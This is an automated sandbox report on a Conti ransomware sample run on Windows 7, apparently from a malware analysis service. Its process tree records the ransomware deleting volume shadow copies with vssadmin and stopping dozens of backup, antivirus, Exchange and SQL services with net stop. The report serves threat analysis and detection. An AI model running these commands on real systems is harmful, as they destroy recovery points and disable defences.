Malware Analysis Report

2024-10-24 18:32

Sample ID 210928-let12abde8
Target 79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample
SHA256 79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9
Tags
conti ransomware
score
10/10

Analysis Overview

score
10/10

SHA256

79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9

Threat Level: Known bad

The file 79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample was found to be: Known bad.

Malicious Activity Summary

conti ransomware

Conti Ransomware

Deletes shadow copies

Modifies extensions of user files

Enumerates connected drives

Drops desktop.ini file(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-28 09:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-28 09:27

Reported

2021-09-28 09:29

Platform

win7-en-20210920

Max time kernel

77s

Max time network

23s

Command Line

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

Signatures

Conti Ransomware

ransomware conti

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware

Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ShowUnprotect.crw => C:\Users\Admin\Pictures\ShowUnprotect.crw.CONTI C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 656 wrote to memory of 864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1492 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1540 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe

Processes

C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

